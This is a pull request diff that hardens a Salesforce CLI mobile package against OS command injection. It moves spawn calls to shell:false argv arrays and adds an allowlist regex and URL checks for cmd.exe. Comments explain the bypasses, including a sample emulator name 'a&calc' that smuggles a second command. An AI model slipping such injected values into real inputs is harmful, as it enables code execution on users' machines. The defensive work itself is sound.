### PR TITLE
fix: harden shell-executing primitives against OS command injection (@W-23665289@)

### DIFF
--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
     "name": "@salesforce/lwc-dev-mobile-core",
     "description": "Core module supporting Salesforce CLI mobile extension plug-ins",
-    "version": "4.0.0-alpha.16",
+    "version": "4.0.0-alpha.17",
     "author": {
         "name": "Meisam Seyed Aliroteh",
         "email": "maliroteh@salesforce.com",

--- a/src/common/AndroidUtils.ts
+++ b/src/common/AndroidUtils.ts
@@ -42,6 +42,15 @@ export class AndroidUtils {
     private static sdkManagerCommand: string | undefined;
     private static sdkRoot: AndroidSDKRoot | undefined;
 
+    // Characters safe to pass to cmd.exe as (Node-quoted) argv elements. Allowlist rather than
+    // denylist: the values that reach the Windows cmd.exe path are structured (an already
+    // space-normalized emulator name, a device id, a `system-images;api;image;abi` path, an abi),
+    // so a strict allowlist rejects anything unexpected instead of trying to enumerate every cmd
+    // metacharacter. `;` and `=` are permitted because the system-image path uses `;` separators
+    // and name=value args exist elsewhere; space is permitted because callers other than AVD-name
+    // normalization may include it. Every cmd metacharacter (`& | < > ^ ( ) " % !`) is excluded.
+    private static readonly CMD_SAFE_ARG = /^[A-Za-z0-9 ._:;@\\/=+-]+$/;
+
     /**
      * Indicates whether Android packages are cached or not.
      *
@@ -876,17 +885,27 @@ export class AndroidUtils {
     // `.exe` but not `.bat`/`.cmd` (ENOENT), and post-CVE-2024-27980 Node refuses to spawn a
     // `.bat`/`.cmd` unless `shell:true` (EINVAL). We therefore launch it through `cmd.exe /c` with
     // shell:false — the same pattern launchUrlInDesktopBrowser uses for `start`. cmd.exe resolves
-    // `avdmanager` to `avdmanager.bat` via PATHEXT, and because spawn still runs with shell:false
-    // Node quotes each argv element; cmd.exe honors those double quotes for the RCE metacharacters
-    // (`& | ; < >`), so untrusted values are not re-interpreted as commands. We do NOT use
-    // shell:true here: shell:true does not escape argv (it joins with spaces), which would
-    // reintroduce the injection this PR removes.
+    // `avdmanager` to `avdmanager.bat` via PATHEXT.
+    //
+    // shell:false alone is NOT sufficient to make argv inert on this cmd.exe path: libuv still
+    // flattens argv into one CreateProcess command line that cmd.exe re-parses with its own grammar,
+    // and libuv only quotes elements containing space/tab/`"`. A bare metacharacter (e.g. an emulator
+    // name `a&calc`) therefore arrives unquoted and cmd.exe splits on `&`; and even a quoted element
+    // can break out via an embedded `"` (cmd.exe does not honor the CRT `\"` escape — the BatBadBut /
+    // CVE-2024-1874 class), plus `%VAR%` is expanded even inside quotes. Double-quoting does not
+    // reliably neutralize any of these, so we validate each argv element against a strict allowlist
+    // before handing it to cmd.exe. We do NOT use shell:true either: shell:true does not escape argv
+    // (it joins with spaces), which would reintroduce the injection this PR removes.
     //
     // Public (rather than private) solely to act as a substitution seam for unit tests, mirroring
     // CommonUtils.spawnWrapper. Tests stub this to assert that untrusted values are handed over as
     // single, inert argv elements and never reach a shell.
     public static spawnChild(command: string, args: string[] = []): childProcess.ChildProcessWithoutNullStreams {
         if (process.platform === WINDOWS_OS) {
+            // Validate each untrusted argv element against a strict allowlist before it reaches
+            // cmd.exe (see method comment). We deliberately do not validate `command`: it is a
+            // trusted, code-derived SDK path (avdmanager), not user input.
+            args.forEach((arg) => AndroidUtils.assertSafeForCmd(arg));
             const child = childProcess.spawn(process.env.comspec ?? 'cmd.exe', ['/d', '/s', '/c', command, ...args], {
                 shell: false
             });
@@ -898,6 +917,15 @@ export class AndroidUtils {
             });
             child.unref();
             return child;
+        }
+    }
+
+    private static assertSafeForCmd(value: string): void {
+        if (!AndroidUtils.CMD_SAFE_ARG.test(value)) {
+            throw new SfError(
+                `Value cannot be safely passed to cmd.exe: ${JSON.stringify(value)}`,
+                'UnsafeCmdArgument'
+            );
         }
     }
 

--- a/src/common/AndroidUtils.ts
+++ b/src/common/AndroidUtils.ts
@@ -367,15 +367,29 @@ export class AndroidUtils {
         // to generate user friendly display names.
         const resolvedName = emulatorName.replace(/ /gi, '_');
 
-        const createAvdCommand = `${AndroidUtils.getAvdManagerCommand()} create avd -n ${resolvedName} --force -k ${AndroidUtils.systemImagePath(
-            platformAPI,
-            emulatorImage,
+        // Build the command as an argv array so that no value (device name, image path,
+        // device type, abi) is ever re-parsed by a shell. spawnChild runs with shell:false,
+        // so each element below is passed to the OS as a single, inert argument.
+        const avdManagerCommand = AndroidUtils.getAvdManagerCommand();
+        const createAvdArgs = [
+            'create',
+            'avd',
+            '-n',
+            resolvedName,
+            '--force',
+            '-k',
+            AndroidUtils.systemImagePath(platformAPI, emulatorImage, abi),
+            '--device',
+            device,
+            '--abi',
             abi
-        )} --device ${device} --abi ${abi}`;
+        ];
+        // Human-readable form used only for error messages/logging (never executed).
+        const createAvdCommand = `${avdManagerCommand} ${createAvdArgs.join(' ')}`;
 
         return new Promise((resolve, reject) => {
             try {
-                const child = AndroidUtils.spawnChild(createAvdCommand);
+                const child = AndroidUtils.spawnChild(avdManagerCommand, createAvdArgs);
                 if (child) {
                     child.stdin.setDefaultEncoding('utf8');
                     child.stdin.write('no');
@@ -851,6 +865,30 @@ export class AndroidUtils {
         });
     }
 
+    // NOTE: detaching a process in windows seems to detach the streams. Prevent spawn from detaching when
+    // used in Windows OS for special handling of some commands (adb).
+    //
+    // The command is passed as an executable + argv array with shell:false so that no
+    // argument is re-parsed by a shell (structurally removes OS command injection). The
+    // Windows/non-Windows branch exists solely for the `detached` behavior described above.
+    //
+    // Public (rather than private) solely to act as a substitution seam for unit tests, mirroring
+    // CommonUtils.spawnWrapper. Tests stub this to assert that untrusted values are handed over as
+    // single, inert argv elements and never reach a shell.
+    public static spawnChild(command: string, args: string[] = []): childProcess.ChildProcessWithoutNullStreams {
+        if (process.platform === WINDOWS_OS) {
+            const child = childProcess.spawn(command, args, { shell: false });
+            return child;
+        } else {
+            const child = childProcess.spawn(command, args, {
+                shell: false,
+                detached: true
+            });
+            child.unref();
+            return child;
+        }
+    }
+
     private static async getAllCurrentlyUsedAdbPorts(logger?: Logger): Promise<number[]> {
         let ports: number[] = [];
         const command = `${AndroidUtils.getAdbShellCommand()} devices`;
@@ -889,31 +927,13 @@ export class AndroidUtils {
     }
 
     private static systemImagePath(platformAPI: string, emuImage: string, abi: string): string {
-        const pathName = `system-images;${platformAPI};${emuImage};${abi}`;
-        if (process.platform === WINDOWS_OS) {
-            return pathName;
-        }
-        return `'${pathName}'`;
+        // No shell quoting here: this value is passed as a single argv element to a
+        // shell:false spawn, so the `;` separators are safe and must remain unquoted.
+        return `system-images;${platformAPI};${emuImage};${abi}`;
     }
 
     private static async fetchInstalledSystemImages(logger?: Logger): Promise<AndroidPackage[]> {
         return AndroidUtils.fetchInstalledPackages(logger).then((packages) => packages.systemImages);
-    }
-
-    // NOTE: detaching a process in windows seems to detach the streams. Prevent spawn from detaching when
-    // used in Windows OS for special handling of some commands (adb).
-    private static spawnChild(command: string): childProcess.ChildProcessWithoutNullStreams {
-        if (process.platform === WINDOWS_OS) {
-            const child = childProcess.spawn(command, { shell: true });
-            return child;
-        } else {
-            const child = childProcess.spawn(command, {
-                shell: true,
-                detached: true
-            });
-            child.unref();
-            return child;
-        }
     }
 
     private static readEmulatorConfig(emulatorName: string, logger?: Logger): Promise<Map<string, string>> {

--- a/src/common/AndroidUtils.ts
+++ b/src/common/AndroidUtils.ts
@@ -869,15 +869,27 @@ export class AndroidUtils {
     // used in Windows OS for special handling of some commands (adb).
     //
     // The command is passed as an executable + argv array with shell:false so that no
-    // argument is re-parsed by a shell (structurally removes OS command injection). The
-    // Windows/non-Windows branch exists solely for the `detached` behavior described above.
+    // argument is re-parsed by a shell (structurally removes OS command injection).
+    //
+    // On Windows the sole caller (createNewVirtualDevice) launches `avdmanager`, which ships as a
+    // `.bat`. `shell:false` cannot launch a `.bat` directly: Windows CreateProcess auto-appends
+    // `.exe` but not `.bat`/`.cmd` (ENOENT), and post-CVE-2024-27980 Node refuses to spawn a
+    // `.bat`/`.cmd` unless `shell:true` (EINVAL). We therefore launch it through `cmd.exe /c` with
+    // shell:false — the same pattern launchUrlInDesktopBrowser uses for `start`. cmd.exe resolves
+    // `avdmanager` to `avdmanager.bat` via PATHEXT, and because spawn still runs with shell:false
+    // Node quotes each argv element; cmd.exe honors those double quotes for the RCE metacharacters
+    // (`& | ; < >`), so untrusted values are not re-interpreted as commands. We do NOT use
+    // shell:true here: shell:true does not escape argv (it joins with spaces), which would
+    // reintroduce the injection this PR removes.
     //
     // Public (rather than private) solely to act as a substitution seam for unit tests, mirroring
     // CommonUtils.spawnWrapper. Tests stub this to assert that untrusted values are handed over as
     // single, inert argv elements and never reach a shell.
     public static spawnChild(command: string, args: string[] = []): childProcess.ChildProcessWithoutNullStreams {
         if (process.platform === WINDOWS_OS) {
-            const child = childProcess.spawn(command, args, { shell: false });
+            const child = childProcess.spawn(process.env.comspec ?? 'cmd.exe', ['/d', '/s', '/c', command, ...args], {
+                shell: false
+            });
             return child;
         } else {
             const child = childProcess.spawn(command, args, {

--- a/src/common/AndroidUtils.ts
+++ b/src/common/AndroidUtils.ts
@@ -9,7 +9,7 @@ import fs from 'node:fs';
 import path from 'node:path';
 import { Logger, Messages, SfError } from '@salesforce/core';
 import { AndroidPackage, AndroidPackages } from './AndroidTypes.js';
-import { Version } from './Common.js';
+import { OSPlatform, Version } from './Common.js';
 import { CommonUtils } from './CommonUtils.js';
 import { PlatformConfig } from './PlatformConfig.js';
 import { LaunchArgument } from './device/BaseDevice.js';
@@ -17,7 +17,6 @@ import { LaunchArgument } from './device/BaseDevice.js';
 Messages.importMessagesDirectoryFromMetaUrl(import.meta.url);
 const messages = Messages.loadMessages('@salesforce/lwc-dev-mobile-core', 'common');
 
-const WINDOWS_OS = 'win32';
 const ANDROID_SDK_MANAGER_NAME = 'sdkmanager';
 const ANDROID_AVD_MANAGER_NAME = 'avdmanager';
 const ANDROID_ADB_NAME = 'adb';
@@ -477,7 +476,7 @@ export class AndroidUtils {
      * @param portNumber The ADB port of the Android virtual device.
      */
     public static async waitUntilDeviceIsReady(portNumber: number, logger?: Logger): Promise<void> {
-        const quote = process.platform === WINDOWS_OS ? '"' : "'";
+        const quote = process.platform === OSPlatform.windows ? '"' : "'";
         const command = `wait-for-device shell ${quote}while [[ -z $(getprop sys.boot_completed) ]]; do sleep 1; done;${quote}`;
         const timeout = PlatformConfig.androidConfig().deviceReadinessWaitTime;
 
@@ -498,7 +497,7 @@ export class AndroidUtils {
      */
     public static async waitUntilDeviceIsPoweredOff(portNumber: number, logger?: Logger): Promise<void> {
         const command =
-            process.platform === WINDOWS_OS
+            process.platform === OSPlatform.windows
                 ? `powershell -Command "while($(adb devices | findstr emulator-${portNumber})){ Start-Sleep -s 1 }"`
                 : `while [[ -n $(adb devices | grep emulator-${portNumber}) ]]; do sleep 1; done;`;
         const timeout = PlatformConfig.androidConfig().deviceReadinessWaitTime;
@@ -597,7 +596,7 @@ export class AndroidUtils {
      * @returns " on Windows and ' on other platforms
      */
     public static platformSpecificPathQuote(): string {
-        return process.platform === WINDOWS_OS ? '"' : "'";
+        return process.platform === OSPlatform.windows ? '"' : "'";
     }
 
     /**
@@ -901,7 +900,7 @@ export class AndroidUtils {
     // CommonUtils.spawnWrapper. Tests stub this to assert that untrusted values are handed over as
     // single, inert argv elements and never reach a shell.
     public static spawnChild(command: string, args: string[] = []): childProcess.ChildProcessWithoutNullStreams {
-        if (process.platform === WINDOWS_OS) {
+        if (process.platform === OSPlatform.windows) {
             // Validate each untrusted argv element against a strict allowlist before it reaches
             // cmd.exe (see method comment). We deliberately do not validate `command`: it is a
             // trusted, code-derived SDK path (avdmanager), not user input.

--- a/src/common/Common.ts
+++ b/src/common/Common.ts
@@ -103,6 +103,15 @@ export enum Platform {
     android = 'android'
 }
 
+// Node's `process.platform` OS identifiers. Defined as `as const` literals rather than a string
+// enum so that `process.platform === OSPlatform.windows` type-checks against Node's `NodeJS.Platform`
+// union (a string enum member is a distinct type and triggers a TS "no overlap" error).
+export const OSPlatform = {
+    windows: 'win32',
+    macos: 'darwin',
+    linux: 'linux'
+} as const;
+
 export enum OutputFormat {
     cli = 'cli',
     api = 'api'

--- a/src/common/CommonUtils.ts
+++ b/src/common/CommonUtils.ts
@@ -14,6 +14,7 @@ import os from 'node:os';
 import { Logger, Messages, SfError } from '@salesforce/core';
 import { AnyJson } from '@salesforce/ts-types';
 import { ux } from '@oclif/core';
+import { OSPlatform } from './Common.js';
 
 type StdioOptions = childProcess.StdioOptions;
 
@@ -349,7 +350,7 @@ export class CommonUtils {
      * @returns The shell-quoted value.
      */
     public static shellQuote(value: string): string {
-        if (process.platform === 'win32') {
+        if (process.platform === OSPlatform.windows) {
             return `"${value.replace(/"/g, '""')}"`;
         }
         return `'${value.replace(/'/g, "'\\''")}'`;
@@ -367,10 +368,10 @@ export class CommonUtils {
         // real executables.
         let command: string;
         let args: string[];
-        if (process.platform === 'darwin') {
+        if (process.platform === OSPlatform.macos) {
             command = 'open';
             args = [url];
-        } else if (process.platform === 'win32') {
+        } else if (process.platform === OSPlatform.windows) {
             // `start` is a cmd.exe builtin, so it must run via cmd.exe. libuv only quotes argv
             // elements containing space/tab/`"`, and cmd.exe treats `& | < > ^ ( )` as
             // metacharacters and expands `%VAR%` even inside quotes. A normal URL (`?a=1&b=2`) has
@@ -415,7 +416,7 @@ export class CommonUtils {
      */
     public static async getLwcServerPort(logger?: Logger): Promise<string | undefined> {
         const getProcessCommand =
-            process.platform === 'win32'
+            process.platform === OSPlatform.windows
                 ? 'wmic process where "CommandLine Like \'%force:lightning:lwc:start%\'" get CommandLine  | findstr -v "wmic"'
                 : 'ps -ax | grep force:lightning:lwc:start | grep -v grep';
 
@@ -533,7 +534,7 @@ export class CommonUtils {
         outDir = CommonUtils.convertToUnixPath(outDir);
 
         const cmd =
-            process.platform === 'win32'
+            process.platform === OSPlatform.windows
                 ? `powershell -Command "$ProgressPreference = 'SilentlyContinue'; Expand-Archive -Path \\"${archive}\\" -DestinationPath \\"${outDir}\\" -Force"`
                 : `unzip -o -qq ${archive} -d ${outDir}`;
 

--- a/src/common/CommonUtils.ts
+++ b/src/common/CommonUtils.ts
@@ -312,9 +312,33 @@ export class CommonUtils {
         stdioOptions: StdioOptions = ['ignore', 'pipe', 'ignore']
     ): childProcess.ChildProcess {
         return childProcess.spawn(command, args, {
-            shell: true,
+            // shell:false so that the OS performs no shell parsing of the command or its
+            // arguments. This structurally removes the OS command-injection class: any value
+            // passed as an argv element is treated as an inert argument, never re-interpreted
+            // as shell syntax (`;`, `$()`, backticks, `&&`, `|`, etc.).
+            shell: false,
             stdio: stdioOptions
         });
+    }
+
+    /**
+     * Quotes a value so that it can be safely interpolated into a command string that is
+     * executed through a shell (i.e. executeCommandAsync / executeCommandSync). This should
+     * only be used for the handful of sinks that genuinely require shell features such as
+     * pipes; prefer passing an argv array to spawnCommandAsync where no shell is needed.
+     *
+     * On POSIX platforms the value is wrapped in single quotes (which disable all shell
+     * interpretation), with any embedded single quote escaped as '\''. On Windows the value
+     * is wrapped in double quotes with embedded double quotes doubled.
+     *
+     * @param value The value to quote.
+     * @returns The shell-quoted value.
+     */
+    public static shellQuote(value: string): string {
+        if (process.platform === 'win32') {
+            return `"${value.replace(/"/g, '""')}"`;
+        }
+        return `'${value.replace(/'/g, "'\\''")}'`;
     }
 
     /**
@@ -323,13 +347,28 @@ export class CommonUtils {
      * @returns A Promise that launches the desktop browser and navigates to the provided URL.
      */
     public static async launchUrlInDesktopBrowser(url: string, logger?: Logger): Promise<void> {
-        const openCmd = process.platform === 'darwin' ? 'open' : process.platform === 'win32' ? 'start' : 'xdg-open';
+        // Pass the URL as a single argv element (shell:false) so it can never be re-parsed by a
+        // shell. On Windows the opener is the cmd.exe builtin `start`, which must be invoked via
+        // `cmd /c` (the empty "" is start's title argument); on macOS/Linux `open`/`xdg-open` are
+        // real executables.
+        let command: string;
+        let args: string[];
+        if (process.platform === 'darwin') {
+            command = 'open';
+            args = [url];
+        } else if (process.platform === 'win32') {
+            command = 'cmd';
+            args = ['/c', 'start', '', url];
+        } else {
+            command = 'xdg-open';
+            args = [url];
+        }
 
         CommonUtils.startCliAction(
             messages.getMessage('launchBrowserAction'),
             messages.getMessage('openBrowserWithUrlStatus', [url])
         );
-        return CommonUtils.executeCommandAsync(`${openCmd} ${url}`, logger).then(() => {
+        return CommonUtils.spawnCommandAsync(command, args, undefined, logger).then(() => {
             CommonUtils.stopCliAction();
             return Promise.resolve();
         });

--- a/src/common/CommonUtils.ts
+++ b/src/common/CommonUtils.ts
@@ -371,8 +371,17 @@ export class CommonUtils {
             command = 'open';
             args = [url];
         } else if (process.platform === 'win32') {
+            // `start` is a cmd.exe builtin, so it must run via cmd.exe. libuv only quotes argv
+            // elements containing space/tab/`"`, and cmd.exe treats `& | < > ^ ( )` as
+            // metacharacters and expands `%VAR%` even inside quotes. A normal URL (`?a=1&b=2`) has
+            // no space, so libuv would leave it unquoted and cmd.exe would split it on `&`. Wrap the
+            // URL in double quotes ourselves, and refuse the two things quoting cannot make safe: an
+            // embedded `"` (which closes cmd's quote context) and `%VAR%` expansion (plus CR/LF).
+            if (/["%\r\n]/.test(url)) {
+                throw new SfError(`URL cannot be safely opened on Windows: ${JSON.stringify(url)}`, 'UnsafeUrl');
+            }
             command = 'cmd';
-            args = ['/c', 'start', '', url];
+            args = ['/c', 'start', '', `"${url}"`];
         } else {
             command = 'xdg-open';
             args = [url];

--- a/src/common/CommonUtils.ts
+++ b/src/common/CommonUtils.ts
@@ -281,20 +281,28 @@ export class CommonUtils {
                     logger?.error(`Error executing command '${fullCommand}':`);
 
                     // also include stderr & stdout for more detailed error
-                    let msg = `stderr:\n${capturedStderr.join()}`;
+                    let msg = `stderr:\n${capturedStderr.join('')}`;
                     if (capturedStdout.length > 0) {
                         msg = `${msg}\nstdout:\n${capturedStdout.join('\n')}`;
                     }
 
                     logger?.error(msg);
-                    reject(new Error(capturedStderr.join()));
+                    reject(new Error(capturedStderr.join('')));
                 } else {
+                    // Join with '' (not the default ',') so multi-chunk stdout/stderr is
+                    // reassembled verbatim. Large outputs (e.g. `xcrun simctl list --json`)
+                    // arrive across several 'data' events; a comma separator would corrupt them.
                     resolve({
-                        stdout: capturedStdout.join(),
-                        stderr: capturedStderr.join()
+                        stdout: capturedStdout.join(''),
+                        stderr: capturedStderr.join('')
                     });
                 }
             });
+
+            // With shell:false, a failure to launch the executable itself (ENOENT, EACCES,
+            // Windows .bat EINVAL) surfaces as an 'error' event rather than a non-zero 'close'.
+            // An 'error' with no listener throws, so without this the promise would never settle.
+            prc.on('error', (err) => reject(err));
         });
     }
 
@@ -328,8 +336,14 @@ export class CommonUtils {
      * pipes; prefer passing an argv array to spawnCommandAsync where no shell is needed.
      *
      * On POSIX platforms the value is wrapped in single quotes (which disable all shell
-     * interpretation), with any embedded single quote escaped as '\''. On Windows the value
-     * is wrapped in double quotes with embedded double quotes doubled.
+     * interpretation), with any embedded single quote escaped as '\''. This is safe against
+     * the full set of POSIX shell metacharacters and is the intended use of this helper —
+     * every current caller is a POSIX-only sink (an `awk`/`grep` pipe).
+     *
+     * The Windows branch only wraps in double quotes and doubles embedded double quotes; it does
+     * NOT neutralize cmd.exe metacharacters (`& | < > ^ %`), so it is not sufficient to sanitize
+     * untrusted input for a cmd.exe command string. Do not add a Windows shell sink that relies on
+     * this for security — pass an argv array to spawnCommandAsync (shell:false) instead.
      *
      * @param value The value to quote.
      * @returns The shell-quoted value.

--- a/src/common/IOSUtils.ts
+++ b/src/common/IOSUtils.ts
@@ -24,8 +24,9 @@ export class IOSUtils {
      * @param waitForBoot Optional boolean indicating whether it should wait for the device to boot up. Defaults to true.
      */
     public static async bootDevice(udid: string, waitForBoot = true, logger?: Logger): Promise<void> {
-        const command = `${XCRUN_CMD} simctl boot ${udid}`;
-        return CommonUtils.executeCommandAsync(command, logger)
+        const args = ['simctl', 'boot', udid];
+        const command = `${XCRUN_CMD} ${args.join(' ')}`;
+        return CommonUtils.spawnCommandAsync(XCRUN_CMD, args, undefined, logger)
             .then(() => {
                 if (waitForBoot) {
                     return IOSUtils.waitUntilDeviceIsReady(udid, logger);
@@ -48,9 +49,8 @@ export class IOSUtils {
      * @param udid The UDID of the simulator to shut down.
      */
     public static async shutdownDevice(udid: string, logger?: Logger): Promise<void> {
-        const command = `${XCRUN_CMD} simctl shutdown ${udid}`;
         try {
-            await CommonUtils.executeCommandAsync(command, logger);
+            await CommonUtils.spawnCommandAsync(XCRUN_CMD, ['simctl', 'shutdown', udid], undefined, logger);
         } catch (error) {
             logger?.warn(error);
         }
@@ -69,8 +69,15 @@ export class IOSUtils {
         runtime: string,
         logger?: Logger
     ): Promise<string> {
-        const command = `${XCRUN_CMD} simctl create '${simulatorName}' ${DEVICE_TYPE_PREFIX}.${deviceType} ${RUNTIME_TYPE_PREFIX}.${runtime}`;
-        return CommonUtils.executeCommandAsync(command, logger)
+        const args = [
+            'simctl',
+            'create',
+            simulatorName,
+            `${DEVICE_TYPE_PREFIX}.${deviceType}`,
+            `${RUNTIME_TYPE_PREFIX}.${runtime}`
+        ];
+        const command = `${XCRUN_CMD} ${args.join(' ')}`;
+        return CommonUtils.spawnCommandAsync(XCRUN_CMD, args, undefined, logger)
             .then((result) => Promise.resolve(result.stdout.trim()))
             .catch((error) => Promise.reject(new SfError(`The command '${command}' failed to execute ${error}`)));
     }
@@ -79,8 +86,9 @@ export class IOSUtils {
      * Attempts to wait for a simulator to finish booting up.
      */
     public static async waitUntilDeviceIsReady(udid: string, logger?: Logger): Promise<void> {
-        const command = `${XCRUN_CMD} simctl bootstatus "${udid}"`;
-        return CommonUtils.executeCommandAsync(command, logger)
+        const args = ['simctl', 'bootstatus', udid];
+        const command = `${XCRUN_CMD} ${args.join(' ')}`;
+        return CommonUtils.spawnCommandAsync(XCRUN_CMD, args, undefined, logger)
             .then(() => Promise.resolve())
             .catch((error) => Promise.reject(new SfError(`The command '${command}' failed to execute ${error}`)));
     }
@@ -102,12 +110,13 @@ export class IOSUtils {
      * @param url The URL to navigate to.
      */
     public static async launchURLInBootedSimulator(udid: string, url: string, logger?: Logger): Promise<void> {
-        const command = `${XCRUN_CMD} simctl openurl "${udid}" ${url}`;
+        const args = ['simctl', 'openurl', udid, url];
+        const command = `${XCRUN_CMD} ${args.join(' ')}`;
         CommonUtils.startCliAction(
             messages.getMessage('launchBrowserAction'),
             messages.getMessage('openBrowserWithUrlStatus', [url])
         );
-        return CommonUtils.executeCommandAsync(command, logger)
+        return CommonUtils.spawnCommandAsync(XCRUN_CMD, args, undefined, logger)
             .then(() => Promise.resolve())
             .catch((error) => Promise.reject(new SfError(`The command '${command}' failed to execute ${error}`)));
     }
@@ -133,17 +142,16 @@ export class IOSUtils {
             const installMsg = messages.getMessage('installAppStatus', [appBundlePath.trim()]);
             logger?.info(installMsg);
             CommonUtils.updateCliAction(installMsg);
-            const installCommand = `${XCRUN_CMD} simctl install ${udid} '${appBundlePath.trim()}'`;
-            await CommonUtils.executeCommandAsync(installCommand, logger);
+            await CommonUtils.spawnCommandAsync(
+                XCRUN_CMD,
+                ['simctl', 'install', udid, appBundlePath.trim()],
+                undefined,
+                logger
+            );
         }
 
-        let launchArgs = '';
-        targetAppArguments?.forEach((arg) => {
-            launchArgs += `${arg.name}=${arg.value} `;
-        });
-
-        const terminateCommand = `${XCRUN_CMD} simctl terminate "${udid}" ${targetApp}`;
-        const launchCommand = `${XCRUN_CMD} simctl launch "${udid}" ${targetApp} ${launchArgs}`;
+        // Each launch argument is passed as a single "name=value" argv element; no shell parsing.
+        const launchArgs = (targetAppArguments ?? []).map((arg) => `${arg.name}=${arg.value}`);
 
         // attempt at terminating the app first (in case it is already running) and then try to launch it again with new arguments.
         // if we hit issues with terminating, just ignore and continue.
@@ -151,7 +159,7 @@ export class IOSUtils {
             const terminateMsg = messages.getMessage('terminateAppStatus', [targetApp]);
             logger?.info(terminateMsg);
             CommonUtils.updateCliAction(terminateMsg);
-            await CommonUtils.executeCommandAsync(terminateCommand, logger);
+            await CommonUtils.spawnCommandAsync(XCRUN_CMD, ['simctl', 'terminate', udid, targetApp], undefined, logger);
         } catch {
             // ignore and continue
         }
@@ -159,7 +167,12 @@ export class IOSUtils {
         const launchMsg = messages.getMessage('launchAppStatus', [targetApp]);
         logger?.info(launchMsg);
         CommonUtils.updateCliAction(launchMsg);
-        await CommonUtils.executeCommandAsync(launchCommand, logger);
+        await CommonUtils.spawnCommandAsync(
+            XCRUN_CMD,
+            ['simctl', 'launch', udid, targetApp, ...launchArgs],
+            undefined,
+            logger
+        );
 
         CommonUtils.stopCliAction();
     }
@@ -170,8 +183,12 @@ export class IOSUtils {
      * @returns The supported iOS device types.
      */
     public static async getSupportedDeviceTypes(logger?: Logger): Promise<string[]> {
-        const command = `${XCRUN_CMD} simctl list devicetypes --json`;
-        const { stdout } = await CommonUtils.executeCommandAsync(command, logger);
+        const { stdout } = await CommonUtils.spawnCommandAsync(
+            XCRUN_CMD,
+            ['simctl', 'list', 'devicetypes', '--json'],
+            undefined,
+            logger
+        );
         const json = JSON.parse(stdout) as { devicetypes: Array<{ identifier: string }> };
         return json.devicetypes.flatMap((item) => item.identifier.split('.').pop() ?? item.identifier);
     }

--- a/src/common/MacNetworkUtils.ts
+++ b/src/common/MacNetworkUtils.ts
@@ -74,7 +74,12 @@ export class MacNetworkUtils {
                     //     status: active
                     // '''
 
-                    const ifconfigCmd = `ifconfig ${parsedLines[i + 1]} | awk '$1 == "inet" {print $2}'`;
+                    // This sink genuinely needs a shell (pipe to awk). The device name comes from
+                    // OS tool output, but it is shell-quoted as defense-in-depth so it can never
+                    // break out of the command string.
+                    const ifconfigCmd = `ifconfig ${CommonUtils.shellQuote(
+                        parsedLines[i + 1]
+                    )} | awk '$1 == "inet" {print $2}'`;
 
                     let ipAddress = CommonUtils.executeCommandSync(ifconfigCmd, undefined, logger);
                     if (ipAddress) {

--- a/src/common/PreviewUtils.ts
+++ b/src/common/PreviewUtils.ts
@@ -8,6 +8,7 @@ import path from 'node:path';
 import { createRequire } from 'node:module';
 import Ajv from 'ajv';
 import { Logger } from '@salesforce/core';
+import { OSPlatform } from './Common.js';
 import { CommandLineUtils } from './CommandLineUtils.js';
 import { CommonUtils } from './CommonUtils.js';
 import { AndroidAppPreviewConfig, IOSAppPreviewConfig, PreviewConfigFile } from './PreviewConfigFile.js';
@@ -159,7 +160,7 @@ export class PreviewUtils {
             return `wss://10.0.2.2:${ports.httpsPort}`;
         }
 
-        if (process.platform !== 'darwin') {
+        if (process.platform !== OSPlatform.macos) {
             return `ws://localhost:${ports.httpPort}`; // cannot be Safari since it is only available on Mac
         }
 

--- a/src/common/device/AndroidDevice.ts
+++ b/src/common/device/AndroidDevice.ts
@@ -341,12 +341,28 @@ export class AndroidDevice implements BaseDevice {
         // spit out a bunch of output to stderr where they are not really errors. This
         // is especially true on the Windows platform. So instead we spawn the process to launch
         // the emulator and later attempt at polling the emulator to see if it failed to boot.
-        const writableFlag = writable ? '-writable-system' : '';
-        const coldFlag = coldBoot ? '-no-snapshot-load' : '';
-        const child = childProcess.spawn(
-            `${AndroidUtils.getEmulatorCommand()} @${this.id} -port ${resolvedPortNumber} ${writableFlag} ${coldFlag}`,
-            { detached: true, shell: true, stdio: 'ignore' }
-        );
+        // Build as executable + argv array with shell:false so that the emulator name (this.id)
+        // and the other values are passed as single, inert arguments and never re-parsed by a
+        // shell (structurally removes OS command injection). Empty flags are omitted rather than
+        // passed as empty strings.
+        const emulatorArgs = [`@${this.id}`, '-port', `${resolvedPortNumber}`];
+        if (writable) {
+            emulatorArgs.push('-writable-system');
+        }
+        if (coldBoot) {
+            emulatorArgs.push('-no-snapshot-load');
+        }
+        const child = childProcess.spawn(AndroidUtils.getEmulatorCommand(), emulatorArgs, {
+            detached: true,
+            shell: false,
+            stdio: 'ignore'
+        });
+        // With shell:false, failure to launch the executable (e.g. ENOENT) surfaces as an 'error'
+        // event rather than a shell exit code. Handle it so it does not become an uncaught
+        // exception; the boot outcome is still verified below via waitUntilDeviceIsReady.
+        child.on('error', (err) => {
+            this.logger?.warn(`Failed to launch emulator process: ${err.message}`);
+        });
         child.unref();
 
         if (waitForBoot) {

--- a/src/common/device/AppleDevice.ts
+++ b/src/common/device/AppleDevice.ts
@@ -125,11 +125,12 @@ export class AppleDevice implements BaseDevice {
     public async isAppInstalled(target: string): Promise<boolean> {
         let result = '';
         try {
-            result = CommonUtils.executeCommandSync(
-                `xcrun simctl listapps ${this.id} | grep "${target}"`,
-                undefined,
-                this.logger
-            );
+            // This sink genuinely needs a shell (pipe to grep). Both interpolated values are
+            // shell-quoted so that no metacharacter can break out of the command string.
+            const command = `xcrun simctl listapps ${CommonUtils.shellQuote(this.id)} | grep ${CommonUtils.shellQuote(
+                target
+            )}`;
+            result = CommonUtils.executeCommandSync(command, undefined, this.logger);
         } catch {
             // ignore and continue
         }
@@ -143,8 +144,12 @@ export class AppleDevice implements BaseDevice {
      * @param appBundlePath Path to the app bundle of the native app.
      */
     public async installApp(appBundlePath: string): Promise<void> {
-        const installCommand = `/usr/bin/xcrun simctl install ${this.id} '${appBundlePath.trim()}'`;
-        await CommonUtils.executeCommandAsync(installCommand, this.logger);
+        await CommonUtils.spawnCommandAsync(
+            '/usr/bin/xcrun',
+            ['simctl', 'install', this.id, appBundlePath.trim()],
+            undefined,
+            this.logger
+        );
     }
 
     /**
@@ -188,7 +193,11 @@ export class AppleDevice implements BaseDevice {
         const certFilePath = path.join(os.tmpdir(), 'localhost.der');
         fs.writeFileSync(certFilePath, derContent);
 
-        const cmd = `/usr/bin/xcrun simctl keychain ${this.id} add-root-cert ${certFilePath}`;
